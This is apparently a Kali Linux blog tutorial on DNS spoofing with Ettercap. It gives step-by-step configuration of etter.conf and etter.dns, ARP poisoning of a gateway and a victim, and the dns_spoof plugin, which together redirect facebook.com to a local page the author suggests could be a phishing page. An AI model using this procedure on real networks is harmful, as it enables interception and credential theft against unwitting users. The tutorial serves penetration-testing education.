Today we gonna learn DNS spoofing in our Kali Linux system with the help of Ettercap, and How to use ettercap in Kali Linux? Before learning DNS spoofing we need a clear idea about DNS. DNS stands for Domain Name System. Domain Name System or DNS server translate a human-readable domain-name (such as google.com, nytimes.com) into a numerical IP address that is used to route communications between nodes.

Screenshot from 2019-07-23 09-12-53.png

As we know every system have an unique IP address, but it is very difficult to remember IP address of many website for a human. So a domain name attached with the IP address. To reduce the effort and improve the performance DNS saves translate data for a limited time which called cache.

This means if it receives another request for same translation, it can replay without needing to ask any other servers until the cache expires.

DNS spoofing is a crucial part of penetration testing. In this method attacker can divert a domain name to a incorrect IP. This results in traffic being diverted to the attacker's computer or any other system.

With the help of DNS spoofing attacker can inject poison in victim's address resolution protocol, and this attack is very hard to detect.

Here for this tutorial we use Ettercap to spoof DNS. Ettercap is a very popular and easy DNS spoofing tool.

How to install ettercap on kali linux?​

You don't need Ettercap comes pre-installed with Kali Linux, before open it we do some configuration. Open our terminal window and edit etter.conf file in any text editor. The file is located in /etc/ettercap/etter.conf. We use leafpad and the command will be:
leafpad /etc/ettercap/etter.conf

The screenshot is following:

Screenshot from 2019-07-23 09-14-44.png

Now we scroll down for the Linux section. The screenshot is following

Screenshot from 2019-07-23 09-22-15.png

Here we use IPtables, so we active two commands of IPtable section. We just need to remove those # to active the commands. See the screenshot given below:

Screenshot from 2019-07-23 09-23-32.png

Then we save and close it. Then we start our apache web server by following command:
service apache2 start

Then we find our local IP by using following command:

The screenshot is following:

Screenshot from 2019-07-15 07-52-28.png

When we open our localhost, it is the homepage of apache web server. We can put anything in our localhost, like phishing page or any malicious web page. Now we change facebook.com domain with our localhost. Means if someone try to open facebook.com in our local network it will open our localhost page not the Facebook.

Now we need to configure another ettercap file called etter.dns by using following command :
leafpad /etc/ettercap/etter.dns

The screenshot is following:

Screenshot from 2019-07-23 09-25-12.png

Then we scrool down and set our target. See the following screenshot:

Screenshot from 2019-07-22 06-54-03.png

We remove the highlighted link in the screenshot, and put the link we want to redirect, in our case it is facebook.com so we put it, and we also change the next line for sub-domains.

Then we will change those IP with our local IP. Then we delete the third line. The configuration shown in following screenshot:

Screenshot from 2019-07-23 09-29-01.png

Then we save the file and close it.

Now we open Ettercap by using following command :
ettercap -G

This will open ettercap's Graphical User Interface(GUI) mode. The screenshot is following

Screenshot from 2019-07-23 09-30-24.png

Then we click on Sniff and then Unified Sniffing. The screenshot is following:

Here we need to choose our network interface. Then it will start unified sniffing.

Now we choose our target. Before choosing target we need to stop unified sniffing. To do that we click on the "Start" menu and click on "Stop Sniffing".

Then we go to Target menu and click on Current Target. We can see that we don't have any target in the following screenshot:

Screenshot from 2019-07-23 09-32-01.png

We need to scan for host. So we click on Host menu and click on Scan for Hosts.

Then we can see the Host List from the Host menu. Here we may see some hosts. We need to choose our default gateway as target 1 and victim as target 2. In our case we are the victim so we added our IP in target.

Then we go to the MITM(Man In The Middle) menu, then we click on ARP Poisoning and select "Sniff remote connection", then click on OK. Now the ARP Poisoning is set.

The next step is we need to go into the Plugins section and then go to Manage the Plugins, and we active the dns-spoof plugin by double clicking on it.

The screenshot is following:

Screenshot from 2019-07-23 09-33-19.png

Now we are all set. We go to the Start menu and click on the Start Sniffing.

Now we open our browser and try to open facebook.com but we will redirect ti our localhost. Here any web page we can set our localhost. If there was a phishing page then it will be very dangerous.